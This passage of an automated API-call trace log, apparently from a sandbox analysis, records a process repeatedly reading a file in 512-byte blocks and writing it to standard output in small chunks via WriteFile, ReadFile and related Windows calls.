nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.354] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.354] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.355] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.356] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.357] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.357] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.358] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.358] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.359] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.359] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.360] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.360] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.361] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.361] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile 